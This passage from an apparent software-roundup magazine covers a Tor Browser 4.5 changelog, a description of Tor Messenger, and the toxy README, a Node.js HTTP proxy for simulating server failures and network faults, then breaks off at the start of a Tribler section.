usage and TLS connection info display
Bug 14937: Hard-code meek and flashproxy node
fingerprints
Bug 15029: Don't prompt to include missing plugins
Bug 15406: Only include addons in incremental
updates if they actually update
Bug 15411: Remove old (and unused) cacheDomain
cache isolation mechanism
Bug 15502: Isolate blob: URI scope to URL domain;
block WebWorker access
Bug 15562: Disable Javascript SharedWorkers due
to third party tracking
Bug 15757: Disable Mozilla video statistics API
extensions
Bug 15758: Disable Device Sensor APIs
Linux
Bug 12468: Only print/write log messages if launched
with --debug
Bug 13375: Create a hybrid GUI/desktop/shell
launcher wrapper
Bug 13717: Make sure we use the bash shell on
Linux
Bug 15672: Provide desktop app registration
+unregistration for Linux

Bug 15747: Improve start-tor-browser argument
handling
Windows
Bug 3861: Begin signing Tor Browser for Windows
the Windows way
Bug 10761: Fix instances of shutdown crashes
Bug 13169: Don't use /dev/random on Windows for
SSP
Bug 14688: Create shortcuts to desktop and start
menu by default (optional)
Bug 15201: Disable 'runas Administrator' codepaths
in updater
Bug 15539: Make installer exe signatures
reproducibly removable
Mac
Bug 10138: Switch to 64bit builds for MacOS
Here is the list of changes since the last 4.5 alpha (4.5a5):
All Platforms
Update Tor to 0.2.6.7 with additional patches:
Bug 15482: Reset timestamp_dirty each time a
SOCKSAuth circuit is used
Update NoScript to 2.6.9.22
Update HTTPS-Everywhere to 5.0.3
Bug 15689: Resume building HTTPSEverywhere from git tags
Update meek to 0.17
Update obfs4proxy to 0.0.5
Update Tor Launcher to 0.2.7.4
Bug 15704: Do not enable network if wizard is
opened
Bug 11879: Stop bootstrap if Cancel or Open
Settings is clicked
Bug 13576: Don't strip "bridge" from the middle
of bridge lines
Bug 15657: Display the host:port of any

connection faiures in bootstrap
Update Torbutton to 1.9.2.2
Bug 15562: Bind SharedWorkers to thirdparty
pref
Bug 15533: Restore default security level when
restoring defaults
Bug 15510: Close Tor Circuit UI control port
connections on New Identity
Bug 15472: Make node text black in circuit
status UI
Bug 15502: Wipe blob URIs on New Identity
Bug 15795: Some security slider prefs do not
trigger custom checkbox
Bug 14429: Disable automatic window resizing
for now
Bug 4100: Raise HTTP Keep-Alive back to 115
second default
Bug 13875: Spoof window.devicePixelRatio to avoid
DPI fingerprinting
Bug 15411: Remove old (and unused) cacheDomain
cache isolation mechanism
Bugs 14716+13254: Fix issues with HTTP Auth
usage and TLS connection info display
Bug 15502: Isolate blob URI scope to URL domain;
block WebWorker access
Bug 15794: Crash on some pages with SVG images
if SVG is disabled
Bug 15562: Disable Javascript SharedWorkers due
to third party tracking
Bug 15757: Disable Mozilla video statistics API
extensions
Bug 15758: Disable Device Sensor APIs
Linux
Bug 15747: Improve start-tor-browser argument
handling
Bug 15672: Provide desktop app registration

+unregistration for Linux
Windows
Bug 15539: Make installer exe signatures
reproducibly removable
Bug 10761: Fix instances of shutdown crashes
Download Tor Browser 4.5

TOR MESSENGER - CHAT OVER TOR, EASILY
Tor Messenger is a cross-platform chat program that aims to be

secure by default and sends all of its traffic over Tor. It supports
a wide variety of transport networks, including Jabber (XMPP),
IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and
others; enables Off-the-Record (OTR) Messaging
automatically; and has an easy-to-use graphical user interface
localized into multiple languages.
WHAT IT ISN'T...
Tor Messenger builds on the networks you are familiar with, so
that you can continue communicating in a way your contacts
are willing and able to do. This has traditionally been in a clientserver model, meaning that your metadata (specifically the
relationships between contacts) can be logged by the server.
However, your route to the server will be hidden because you
are communicating over Tor.
We are also excited about systems like Pond and Ricochet,
which try to solve this problem, and would encourage you to
look at their designs and use them too.
WHY INSTANTBIRD?
We considered a number of messaging clients: Pidgin, Adam
Langley's xmpp-client, and Instantbird. Instantbird was the
pragmatic choice -- its transport protocols are written in a
memory-safe language (JavaScript); it has a graphical user
interface and already supports many natural languages; and it's
a XUL application, which means we can leverage both the code
(Tor Launcher) and in-house expertise that the Tor Project has
developed working on Tor Browser with Firefox. It also has an
active and vibrant software developer community that has been
very responsive and understanding of our needs. The main
feature it lacked was OTR support, which we have
implemented and hope to upstream to the main Instantbird
repository for the benefit of all Instantbird (and Thunderbird)
users.
INSTRUCTIONS
On Linux, extract the bundle(s) and then run: ./starttor-messenger.desktop
On OS X, copy the Tor Messenger application from the
disk image to your local disk before running it.

On all platforms, Tor Messenger sets the profile folder for
Firefox/Instantbird to the installation directory.
Note that as a policy, unencrypted one-to-one
conversations are not allowed and your messages will not
be transmitted if the person you are talking with does not
have an OTR-enabled client. You can disable this option
in the preferences to allow unencrypted communication
but doing so is not recommended.
DownloadTor Messenger:
Linux (32-bit)
Linux (64-bit)
Windows
OS X (Mac)
TOXY - HACKABLE HTTP PROXY TO SIMULATE SERVER

FAILURE SCENARIOS AND NETWORK CONDITIONS
Toxy is a fully programmatic and hackable HTTP proxy to

simulate server failure scenarios and unexpected network
conditions , built for node.js / io.js .
It was mainly designed for fuzzing/evil testing purposes, when
toxy becomes particularly useful to cover fault tolerance and
resiliency capabilities of a system, especially in disruptiontolerant networks and service-oriented architectures, where
toxy may act as MitM proxy among services.
toxy allows you to plug in poisons, optionally filtered by rules,
which essentially can intercept and alter the HTTP flow as you
need, performing multiple evil actions in the middle of that
process, such as limiting the bandwidth, delaying TCP packets,
injecting network jitter latency or replying with a custom error or
status code. It operates only at L7 (application level).
toxy can be fluently used programmatically or via HTTP API . It
was built on top of rocky , a full-featured middleware-oriented
HTTP proxy, and it's also pluggable inconnect / express as
standard middleware.
Requires node.js +0.12 or io.js +1.6
Features
Full-featured HTTP/S proxy (backed by rocky and httpproxy )

Hackable and elegant programmatic API (inspired on
connect/express)
Admin HTTP API for external management and dynamic
configuration
Featured built-in router with nested configuration
Hierarchical and composable poisoning with rule based
filtering
Hierarchical middleware layer (both global and route
scopes)
Easily augmentable via middleware (based on connect/
express middleware)
Supports both incoming and outgoing traffic poisoning
Built-in poisons (bandwidth, error, abort, latency, slow
read...)
Rule-based poisoning (probabilistic, HTTP method,
headers, body...)
Supports third-party poisons and rules
Built-in balancer and traffic interceptor via middleware
Inherits API and features from rocky
Compatible with connect/express (and most of their
middleware)
Able to run as standalone HTTP proxy
Introduction
Why toxy?
There're some other similar solutions like toxy in the market,
but most of them do not provide a proper programmatic control
and usually are not easy to hack, configure or are directly
closed to extensibility.
Furthermore, the majority of the those solutions only operates
at TCP L3 level stack instead of providing high-level
abstractions to cover common requirements in the specific
domain and nature of the HTTP L7 protocol, like toxy tries to
provide
toxy brings a powerful hackable and extensible solution with a
convenient abstraction, but without losing a proper low-level
interface capabilities to deal with HTTP protocol primitives
easily.
toxy was designed based on the rules of composition, simplicity
and extensibility. Via its built-in hierarchical domain specific
middleware layer you can easily augment toxy features to your
own needs.
Concepts
toxy introduces two directives: poisons and rules.
Poisons are the specific logic which infects an incoming or
outgoing HTTP transaction (e.g: injecting a latency, replying
with an error). One HTTP transaction can be poisoned by one
or multiple poisons, and those poisons can be also configured
to infect both global or route level traffic.
Rules are a kind of match validation filters that inspects an
HTTP request/response in order to determine, given a certain
rules, if the HTTP transaction should be poisioned or not (e.g: if
headers matches, query params, method, body...). Rules can
be reused and applied to both incoming and outgoing traffic
flows, including different scopes: global, route or poison level.
How it works
( Incoming request )
|||
+-------------+
| Toxy Router |
-> Match the incoming request
+-------------+
|||
+--------------------+
|
Incoming phase
| -> The proxy receives the
request from the client

|~~~~~~~~~~~~~~~~~~~~|
|
----------------
| -> Apply configured rules for
Exec Rules
the incoming request

|
|
---------------|||
|
|
----------------
| Exec Poisons |
| -> If all rules passed, then
poison the HTTP flow
----------------
+~~~~~~~~~~~~~~~~~~~~+
+--------------------+
|
HTTP dispatcher
| -> Forward the HTTP traffic to
the target server, either poisoned or not

+--------------------+
+--------------------+
|
Outgoing phase
| -> Receives response from
target server
|~~~~~~~~~~~~~~~~~~~~|
|
----------------
| -> Apply configured rules for
Exec Rules
the outgoing request

|
----------------
|||
|
|
----------------
| Exec Poisons |
| -> If all rules passed, then
poison the HTTP flow before send it to the client

|
----------------
+~~~~~~~~~~~~~~~~~~~~+
|||
( Send to the client ) -> Finally, send the request

to the client, either poisoned or not
Usage
Installation
npm install toxy
Examples
See examples directory for more use cases.
var toxy = require('toxy')
var poisons = toxy.poisons
var rules = toxy.rules
// Create a new toxy proxy
var proxy = toxy()
// Default server to forward incoming traffic
proxy
.forward('http://httpbin.org')
// Register global poisons and rules
proxy
.poison(poisons.latency({ jitter: 500 }))
.rule(rules.probability(25))
// Register multiple routes
proxy
.get('/download/*')
.forward('http://files.myserver.net')
.poison(poisons.bandwidth({ bps: 1024 }))
.withRule(rules.headers({'Authorization': /^Bearer (.*)
$/i }))
// Infect outgoing traffic only (after the server replied
properly)
proxy
.get('/image/*')
.outgoingPoison(poisons.bandwidth({ bps: 512 }))
.withRule(rules.method('GET'))
.withRule(rules.timeThreshold({ duration: 1000,
threshold: 1000 * 10 }))
.withRule(rules.responseStatus({ range: [ 200,
400 ] }))
proxy
.all('/api/*')
.poison(poisons.rateLimit({ limit: 10, threshold:
1000 }))
.withRule(rules.method(['POST', 'PUT', 'DELETE']))
// And use a different more permissive poison for GET
requests
.poison(poisons.rateLimit({ limit: 50, threshold:
1000 }))
.withRule(rules.method('GET'))
// Handle the rest of the traffic
proxy
.all('/*')
.poison(poisons.slowClose({ delay: 1000 }))
.poison(poisons.slowRead({ bps: 128 }))
.withRule(rules.probability(50))
proxy.listen(3000)
console.log('Server listening on port:', 3000)
console.log('Test it:', 'http://localhost:3000/image/
jpeg')
Poisons
Poisons host specific logic which intercepts and mutates,

wraps, modify and/or cancel an HTTP transaction in the proxy
server. Poisons can be applied to incoming or outgoing, or
even both traffic flows.
Poisons can be composed and reused for different HTTP
scenarios. They are executed in FIFO order and
asynchronously.
Poisoning scopes
toxy has a hierarchical design based on two different scopes:
global and route .
Global scope points to all the incoming HTTP traffic received
by the proxy server, regardless of the HTTP method or path.
Route scope points to any incoming traffic which matches with
a specific HTTP verb and URI path.
Poisons can be plugged to both scopes, meaning you can
operate with better accuracy and restrict the scope of the
poisoning, for instance, you might wanna apply a bandwidth
limit poisoning only to a certain routes, such as /download or /
images .
See routes.js for a featured example.
Poisoning phases
Poisons can be plugged to incoming or outgoing traffic flows, or
even both.
Incoming poisoning is applied when the traffic has been
received by proxy but it has not been forwarded to the target
server yet.
Outgoing poisoning refers to the traffic that has been
forwarded to the target server and when proxy recieves the
response from it, but that response has not been sent to the
client yet.
This means, essentially, that you can plug in your poisons to
infect the HTTP traffic before or after the request is forwarded
to the target HTTP server or sent to the client.

This allows you apply a better and more accurated poisoning
based on the request or server response. For instance, given
the nature of some poisons, likeinject error , you may want
to enable it according to the target server response (e.g: some
header is present or not).
See poison-phases.js for a featured example.
Built-in poisons
Latency
Name
latency
Poisoning Phase
incoming / outgoing
Reaches the server
true
Infects the HTTP flow injecting a latency jitter in the response

Arguments :
options object
jitter number - Jitter value in miliseconds
max number - Random jitter maximum value
min number - Random jitter minimum value
toxy.poison(toxy.poisons.latency({ jitter: 1000 }))
// Or alternatively using a random value
toxy.poison(toxy.poisons.latency({ max: 1000, min:
100 }))
Inject response
Name
inject
Poisoning Phase
incoming / outgoing
Reaches the server
false (only as incoming poison)
Injects a custom response, intercepting the request before

sending it to the target server. Useful to inject errors originated
in the server.
Arguments :
options object
code number - Response HTTP status code. Default
500
headers object - Optional headers to send

body mixed - Optional body data to send. It can be a
buffer or string
encoding string - Body encoding. Default to utf8
toxy.poison(toxy.poisons.inject({
code: 503,
body: '{"error": "toxy injected error"}',
headers: {'Content-Type': 'application/json'}
}))
Bandwidth
Name
bandwidth
Poisoning Phase
incoming / outgoing
Reaches the server
true
Limits the amount of bytes sent over the network in outgoing

HTTP traffic for a specific time frame.
This poison is basically an alias to throttle.
Arguments :
options object
bytes number - Amount of chunk of bytes to send.
Default 1024
threshold number - Packets time frame in
miliseconds. Default 1000

toxy.poison(toxy.poisons.bandwidth({ bytes: 512 }))
Rate limit
Name
rateLimit
Poisoning Phase
incoming / outgoing
Reaches the server
true
Limits the amount of requests received by the proxy in a

specific threshold time frame. Designed to test API limits.
Exposes typical X-RateLimit-* headers.
Note that this is very simple rate limit implementation, indeed
limits are stored in-memory, therefore are completely volalite.
There're a bunch of featured and consistent rate limiter
implementations in npm that you can plug in as poison. You
might be also interested in token bucket algorithm.
Arguments :
options object
limit number - Total amount of requests. Default to
10
threshold number - Limit time frame in miliseconds.

Default to 1000
message string - Optional error message when
limit is reached.
code number - HTTP status code when limit is
reached. Default to 429 .
toxy.poison(toxy.poisons.rateLimit({ limit: 5, threshold:

10 * 1000 }))
Slow read
Name
rateLimit
Poisoning Phase
incoming
Reaches the server
true
Reads incoming payload data packets slowly. Only valid for

non-GET request.
Arguments :
options object
chunk number - Packet chunk size in bytes. Default
to 1024
threshold number - Limit threshold time frame in
miliseconds. Default to 1000
toxy.poison(toxy.poisons.slowRead({ chunk: 2048,
threshold: 1000 }))
Slow open
Name: slowOpen
Name
slowOpen
Poisoning Phase
incoming
Reaches the server
true
Delays the HTTP connection ready state.

Arguments :
options object
delay number - Delay connection in miliseconds.
Default to 1000
toxy.poison(toxy.poisons.slowOpen({ delay: 2000 }))
Slow close
Name
slowClose
Poisoning Phase
incoming / outgoing
Reaches the server
true
Delays the HTTP connection close signal (EOF).

Arguments :
options object
delay number - Delay time in miliseconds. Default to
1000
toxy.poison(toxy.poisons.slowClose({ delay: 2000 }))
Throttle
Name
throttle
Poisoning Phase
incoming / outgoing
Reaches the server
true
Restricts the amount of packets sent over the network in a

specific threshold time frame.
Arguments :
options object
chunk number - Packet chunk size in bytes. Default
to 1024
delay object - Data chunk delay time frame in
toxy.poison(toxy.poisons.throttle({ chunk: 2048,
threshold: 1000 }))
Abort connection
Name
abort
Poisoning Phase
incoming / outgoing
Reaches the server
false (only as incoming poison)
Aborts the TCP connection. From the low-level perspective, this

will destroy the socket on the server, operating only at TCP
level without sending any specific HTTP application level data.
Arguments :
options object
delay number - Aborts TCP connection after waiting
the given miliseconds. Default to 0
next boolean - If true , the connection will be
aborted if the target server takes more than the
delay param time to reply. Default tofalse
error Error - Custom internal node.js error to use
when destroying the socket. Default to null
// Basic connection abort
toxy.poison(toxy.poisons.abort())
// Abort after a delay
toxy.poison(toxy.poisons.abort(1000))
// In this case, the socket will be closed if
// the target server takes more than
// 2 seconds to respond
toxy.poison(toxy.poisons.abort({ delay: 2000, next:
true }))
Timeout
Name
timout
Poisoning Phase
incoming / outgoing
Reaches the server
true
Defines a response timeout. Useful when forward to potentially

slow servers.
Arguments :
miliseconds number - Timeout limit in miliseconds
toxy.poison(toxy.poisons.timeout(5000))
How to write poisons

Poisons are implemented as standalone middleware (like in
connect/express).
Here's a simple example of a server latency poison:
function customLatency(delay) {
/**
* We name the function since toxy uses it as
identifier to get/disable/remove it in the future
*/
return function customLatency(req, res, next) {
var timeout = setTimeout(clean, delay)
req.once('close', onClose)
function onClose() {
clearTimeout(timeout)
next('client connection closed')
}
function clean() {
req.removeListener('close', onClose)
next()
}
}
}
var proxy = toxy()

// Register and enable the poison
proxy
.get('/foo')
.poison(customLatency(2000))
You can optionally extend the build-in poisons with your own
poisons:
toxy.addPoison(customLatency)
// Then you can use it as a built-in poison
proxy
.get('/foo')
.poison(toxy.poisons.customLatency)
For featured real example, take a look to the built-in poisons

implementation.
Rules
Rules are simple validation filters which inspects an incoming

or outgoing HTTP traffic in order to determine, given a certain
rules (e.g: matches the method, headers, query params,
body...), if the current HTTP transaction should be poisoned or
not, based on the resolution value of the rule.
Rules are useful to compose, decouple and reuse logic among
different scenarios of poisoning. Rules can be applied to global,
route or even poison scope, and it also applies to both phases
of poisoning .
Rules are executed in FIFO order. Their evaluation logic is
equivalent to Array#every() in JavaScript: all the rules must
pass in order to proceed with the poisoning.
Built-in rules
Probability
Name
probability
Poison Phase
incoming / outgoing
Enables the rule by a random probabilistic. Useful for random

poisoning.
Arguments :
percentage number - Percentage of filtering. Default 50
var rule = toxy.rules.probability(85)
toxy.rule(rule)
Time threshold
Name
timeThreshold
Poison Phase
incoming / outgoing
Simple rule to enable poisons based on a specific time

threshold and duration. For instance, you can enable a certain
poisons during a specific amount of time (e.g: 1 second) within
a time threshold (e.g: 1 minute).
Arguments :
options object
duration number - Enable time inverval in
threshold number - Time threshold in miliseconds to
wait before re-enable the poisoning. Default to 10000
// Enable the poisoning only 100 miliseconds per each 10
seconds
proxy.rule(toxy.rules.timeThreshold(100))
// Enable poisoning during 1 second every minute
proxy.rule(toxy.rules.timeThreshold({ duration: 1000,
period: 1000 * 60 }))
Method
Name
method
Poison Phase
incoming / outgoing
Filters by HTTP method.

Arguments :
method string|array - Method or methods to filter.
var method = toxy.rules.method(['GET', 'POST'])
toxy.rule(method)
Content Type
Filters by content type header. It should be present
Arguments :
value string|regexp - Header value to match.
var rule = toxy.rules.contentType('application/json')
toxy.rule(rule)
Headers
Name
headers
Poison Phase
incoming / outgoing
Filter by request headers.

Arguments :
headers object - Headers to match by key-value pair.
value can be a string, regexp, boolean or
function(headerValue, headerName) => boolean
var matchHeaders = {
'content-type': /âpplication/\json/i,
'server': true, // meaning it should be present,
'accept': function (value, key) {
return value.indexOf('text') !== -1
}
}
var rule = toxy.rules.headers(matchHeaders)
toxy.rule(rule)
Response headers
Name
responseHeaders
Poison Phase
outgoing
Filter by response headers from target server. Same as

headers rule, but evaluating the outgoing request.
Arguments :
headers object - Headers to match by key-value pair.
value can be a string , regexp , boolean or
function(headerValue, headerName) => boolean
var matchHeaders = {
'content-type': /âpplication/\json/i,
'server': true, // meaning it should be present,
'accept': function (value, key) {
return value.indexOf('text') !== -1
}
}
var rule = toxy.rules.responseHeaders(matchHeaders)
toxy.rule(rule)
Body
Name
body
Poison Phase
incoming / outgoing
Match incoming body payload by a given string , regexp or

custom filter function .
This rule is pretty simple, so for complex body matching (e.g:
validating against a JSON schema) you should probably write
your own rule.
Arguments :
match string|regexp|function - Body content to match
limit string - Optional. Body limit in human size. E.g: 5mb
length number - Body length. Default taken from
Content-Length header
var rule = toxy.rules.body('"hello":"world"')
toxy.rule(rule)
// Or using a filter function returning a boolean
var rule = toxy.rules.body(function contains(body) {
return body.indexOf('hello') !== -1
})
toxy.rule(rule)
Response body
Name
responseBody
Poison Phase
outgoing
Match outgoing body payload by a given string , regexp or

custom filter function .
Arguments :
match string|regexp|function - Body content to match
length number - Body length. Default taken from
Content-Length header
var rule = toxy.rules.responseBody('"hello":"world"')
toxy.rule(rule)
// Or using a filter function returning a boolean

var rule = toxy.rules.responseBody(function
contains(body) {
return body.indexOf('hello') !== -1
})
toxy.rule(rule)
Response status
Name
responseStatus
Poison Phase
outgoing
Evaluates the response status from the target server. Only

applicable to outgoing poisons.
Arguments :
range array - Pair of status code range to match. Default
[200, 300] .
lower number - Compare status as lower than
operation. Default to null .
higher number - Compare status as higher than
operation. Default to null .
value number - Status code to match using a strict
equality comparison. Default null .
include array - Unordered list of status codes to match.
Useful to specify custom status. Default null
// Strict evaluation of the status code
toxy.rule(toxy.rules.responseBody(200))
// Using a range of valid status
toxy.rule(toxy.rules.responseBody([200, 204]))
// Using relational comparison
toxy.rule(toxy.rules.responseBody({ higher: 199, lower:
400 }))
// Custom unordered status code to match

toxy.rule(toxy.rules.responseBody({ include: [200, 204,
400, 404] }))
Third-party rules
List of available third-party rules provided by the community.
PR are welcome.
IP - Enable/disable poisons based on the client IP address
(supports CIDR, subnets, ranges...).
How to write rules
Rules are simple middleware functions that resolve
asyncronously with a boolean value to determine if a given
HTTP transaction should be ignored when poisoning.
Your rule must resolve with a boolean param calling the
next(err, shouldIgnore) function in the middleware,
passing a true value if the rule has not matches and should
not apply the poisoning, and therefore continuing with the next
middleware stack.
Here's an example of a simple rule matching the HTTP method
to determine if:
function customMethodRule(matchMethod) {
/**
* We name the function since it's used by toxy to
identify the rule to get/disable/remove it in the future
*/
return function customMethodRule(req, res, next) {
var shouldIgnore = req.method !== matchMethod
next(null, shouldIgnore)
}
}
var proxy = toxy()

// Register and enable the rule
proxy
.get('/foo')
.rule(customMethodRule('GET'))
.poison(/* ... */)
You can optionally extend the build-in rules with your own rules:
toxy.addRule(customMethodRule)
// Then you can use it as a built-in poison
proxy
.get('/foo')
.rules(toxy.rules.customMethodRule)
For featured real examples, take a look to the built-in rules

implementation
Programmatic API
toxy API is completely built on top the rocky API . In other
words, you can use any of the methods, features and

middleware layer natively provided byrocky .
toxy([ options ])
Create a new toxy proxy.
For supported options , please see rocky documentation
toxy({ forward: 'http://server.net', timeout: 30000 })
toxy
.get('/foo')
.poison(toxy.poisons.latency(1000))
.withRule(toxy.rules.contentType('json'))
.forward('http://foo.server')
toxy
.post('/bar')
.poison(toxy.poisons.bandwidth({ bps: 1024 }))
.withRule(toxy.rules.probability(50))
.forward('http://bar.server')
toxy
.post('/boo')
.outgoingPoison(toxy.poisons.bandwidth({ bps: 1024 }))
.withRule(toxy.rules.method('GET'))
.forward('http://boo.server')
toxy.all('/*')
toxy.listen(3000)
toxy#get(path, [ middleware... ])
Return: ToxyRoute
Register a new route for GET method.
toxy#post(path, [ middleware... ])
Return: ToxyRoute
Register a new route for POST method.
toxy#put(path, [ middleware... ])
Return: ToxyRoute
Register a new route for PUT method.
toxy#patch(path, [ middleware... ])
Return: ToxyRoute
toxy#delete(path, [ middleware... ])
Return: ToxyRoute
Register a new route for DELETE method.
toxy#head(path, [ middleware... ])
Return: ToxyRoute
Register a new route for HEAD method.
toxy#all(path, [ middleware... ])
Return: ToxyRoute
Register a new route for any method.
toxy#poisons => Object
Exposes a map with the built-in poisons. Prototype alias to
toxy.poisons
toxy#rules => Object

Exposes a map with the built-in poisons. Prototype alias to
toxy.rules
toxy#forward(url)
Define a URL to forward the incoming traffic received by the
proxy.
toxy#balance(urls)
Forward to multiple servers balancing among them.
For more information, see the rocky docs
toxy#replay(url)
Define a new replay server. You can call this method multiple
times to define multiple replay servers.
toxy#use(middleware)
Plug in a custom middleware.

For more information, see the rocky docs .
toxy#useResponse(middleware)
Plug in a response outgoing traffic middleware.
For more information, see the rocky docs .
toxy#useReplay(middleware)
Plug in a replay traffic middleware.
toxy#requestBody(middleware)
Intercept incoming request body. Useful to modify it on the fly.
toxy#responseBody(middleware)
Intercept outgoing response body. Useful to modify it on the fly.
toxy#middleware()
Return a standard middleware to use with connect/express.
toxy#host(host)
Overwrite the Host header with a custom value. Similar to
forwardHost option.
toxy#redirect(url)
Redirect traffic to the given URL.
toxy#findRoute(routeIdOrPath, [ method ])
Find a route by ID or path and method.
toxy#listen(port)
Starts the built-in HTTP server, listening on a specific TCP port.
toxy#close([ callback ])
Closes the HTTP server.

toxy#poison(poison)
Alias: usePoison , useIncomingPoison
Register a new poison to infect incoming traffic.
toxy#outgoingPoison(poison)
Alias: useOutgoingPoison , responsePoison
Register a new poison to infect outgoing traffic.
toxy#rule(rule)
Alias: useRule
Register a new rule.
toxy#withRule(rule)
Aliases: poisonRule , poisonFilter
Apply a new rule for the latest registered poison.
toxy#enable(poison)
Enable a poison by name identifier
toxy#disable(poison)
Disable a poison by name identifier
toxy#remove(poison)
Return: boolean
Remove poison by name identifier.
toxy#isEnabled(poison)
Return: boolean
Checks if a poison is enabled by name identifier.
toxy#disableAll()
Alias: disablePoisons
Disable all the registered poisons.
toxy#getPoison(name)
Return: Directive|null
Searchs and retrieves a registered poison in the stack by name
identifier.
toxy#getIncomingPoison(name)
Searchs and retrieves a registered incoming poison in the
stack by name identifier.
toxy#getOutgoingPoison(name)
Searchs and retrieves a registered outgoing poison in the
stack by name identifier.
toxy#getPoisons()
Return: array<Directive>
Return an array of registered poisons.
toxy#getIncomingPoisons()
Return an array of registered incoming poisons.
toxy#getOutgoingPoisons()
Return an array of registered outgoing poisons.
toxy#flush()
Alias: flushPoisons
Remove all the registered poisons.
toxy#enableRule(rule)
Enable a rule by name identifier.
toxy#disableRule(rule)
Disable a rule by name identifier.
toxy#removeRule(rule)
Return: boolean
Remove a rule by name identifier.
toxy#disableRules()
Disable all the registered rules.
toxy#isRuleEnabled(rule)
Return: boolean
Checks if the given rule is enabled by name identifier.
toxy#getRule(rule)
Searchs and retrieves a registered rule in the stack by name
identifier.
toxy#getRules()
Returns and array with the registered rules wrapped as
Directive .
toxy#flushRules()
Remove all the rules.
toxy.addPoison(name, fn)
Extend built-in poisons.
toxy.addRule(name, fn)
Extend built-in rules.
toxy.poisons => Object
Exposes a map with the built-in poisons.
toxy.rules => Object
Exposes a map with the built-in rules.
toxy.VERSION => String

Current toxy semantic version.
ToxyRoute
ToxyRoute exposes the same interface as Toxy global
interface, it just adds some route level additional methods .

Further actions you perform againts the ToxyRoute API will
only be applicable at route-level (nested). In other words: you
already know the API.
This example will probably clarify possible doubts:
var proxy = toxy()
// Now using the global API
proxy
.forward('http://server.net')
.rule(toxy.rules.method('GET'))
// Now create a route
var route = proxy
.get('/foo')
.toPath('/bar') // Route-level API method
.host('server.net') // Route-level API method
.forward('http://new.server.net')
// Now using the ToxyRoute interface
route
.rule(toxy.rules.contentType('json'))
Directive(middlewareFn)
A convenient wrapper internally used for poisons and rules.
Normally you don't need to know this interface, but for hacking
purposes or more low-level actions might be useful.
Directive#enable()
Return: boolean
Directive#disable()
Return: boolean
Directive#isEnabled()
Return: boolean
Directive#rule(rule)
Alias: filter
Directive#handler()
Return: function(req, res, next)
HTTP API
The toxy HTTP API follows the JSON API conventions,
including resource based hypermedia linking.

Usage
For a featured use case, see the admin server example.
const toxy = require('toxy')
// Create the toxy admin server
var admin = toxy.admin({ cors: true })
admin.listen(9000)
// Create the toxy proxy
var proxy = toxy()
proxy.listen(3000)
// Add the toxy instance to be managed by the admin

server
admin.manage(proxy)
// Then configure the proxy
proxy
.forward('http://my.target.net')
proxy
.get('/slow')
// Handle the rest of the traffic
proxy
.all('/*')
.poison(toxy.poisons.bandwidth({ bps: 1024 * 5 }))
console.log('toxy proxy listening on port:', 3000)
console.log('toxy admin server listening on port:', 9000)
For more details about the admin programmatic API, see

below .
Authorization
The HTTP API can be protected to unauthorized clients.
Authorized clients must define the API key token via API-Key
or Authorization HTTP headers.
To enable it, you should simple pass the following options to
toxy admin server:
const toxy = require('toxy')
const opts = { apiKey: 's3cr3t' }
var admin = toxy.admin(opts)

admin.listen(9000)
console.log('protected toxy admin server listening on
port:', 9000)
API
Hierarchy :
Servers - Managed toxy instances
Rules - Globally applied rules
Poisons - Globally applied poisons
Rules - Poison-specific rules
Routes - List of configured routes
Route - Object for each specific route
Rules - Route-level registered rules
Poisons - Route-level registered poisons
Rules - Route-level poison-specific
rules
GET /
Servers
GET /servers
GET /servers/:id
Rules
GET /servers/:id/rules
POST /servers/:id/rules
Accepts: application/json
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/rules
GET /servers/:id/rules/:id
DELETE /servers/:id/rules/:id
Poisons
GET /servers/:id/poison
POST /servers/:id/poisons
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/poisons
GET /servers/:id/poisons/:id
DELETE /servers/:id/poisons/:id
GET /servers/:id/poisons/:id/rules
POST /servers/:id/poisons/:id/rules
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/poisons/:id/rules
GET /servers/:id/poisons/:id/rules/:id
DELETE /servers/:id/poisons/:id/rules/:id
Routes
GET /servers/:id/routes
POST /servers/:id/routes
Example payload:
{
"path": "/foo", // Required
"method": "GET", // use ALL for all the methods
"forward": "http://my.server", // Optional custom
forward server URL
}
DELETE /servers/:id/routes
GET /servers/:id/routes/:id
DELETE /servers/:id/routes/:id
Route rules
GET /servers/:id/routes/:id/rules
POST /servers/:id/routes/:id/rules
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/rules
GET /servers/:id/routes/:id/rules/:id
DELETE /servers/:id/routes/:id/rules/:id
Route poisons
GET /servers/:id/routes/:id/poisons
POST /servers/:id/routes/:id/poisons
Example payload:
{
"name": "latency",
"phase": "outgoing",
"options": { "jitter": 1000 }
}
DELETE /servers/:id/routes/:id/poisons
GET /servers/:id/routes/:id/poisons/:id
DELETE /servers/:id/routes/:id/poisons/:id
GET /servers/:id/routes/:id/poisons/:id/rules
POST /servers/:id/routes/:id/poisons/:id/rules
Example payload:
{
"name": "method",
"options": "GET"
}
DELETE /servers/:id/routes/:id/poisons/:id/rules
GET /servers/:id/routes/:id/poisons/:id/rules/:id
DELETE /servers/:id/routes/:id/poisons/:id/rules/:id
Programmatic API
The built-in HTTP admin server also provides a simple interface
open to extensibility and hacking purposes. For instance, you
can plug in additional middleware to the admin server, or
register new routes.
toxy.admin([ opts ])
Returns: Admin
Supported options :
apiKey string - Optional API key to protect the server
port number - Optional. TCP port to listen
cors boolean - Enable CORS for web browser access
middleware array<function> - Plug in additional
middleware
ssl object - Node.js HTTPS server TLS options .
Admin#listen([ port, host ])
Start listening on the network.
Admin#manage(toxy)
Manage a toxy server instance.
Admin#find(toxy)
Find a toxy instance. Accepts toxy server ID or toxy instance.
Admin#remove(toxy)
Stop managing a toxy instance.
Admin#use(...middleware)
Register a middleware.
Admin#param(...middleware)
Register a param middleware.
Admin#get(path, [ ...middleware ])
Register a GET route.
Admin#post(path, [ ...middleware ])
Register a POST route.
Admin#put(path, [ ...middleware ])
Register a PUT route.
Admin#delete(path, [ ...middleware ])
Register a DELETE route.
Admin#patch(path, [ ...middleware ])
Register a PATCH route.
Admin#all(path, [ ...middleware ])
Register a route accepting any HTTP method.
Admin#middleware(req, res, next)
Middleware to plug in with connect/express.
Admin#close(cb)
Stop the server.
Download Toxy
TRIBLER - DOWNLOAD TORRENTS USING TOR-INSPIRED
ONION ROUTING
Tribler is a research project of Delft University of Technology.

Tribler was created over nine years ago as a new open source
Peer-to-Peer file sharing program. During this time over one
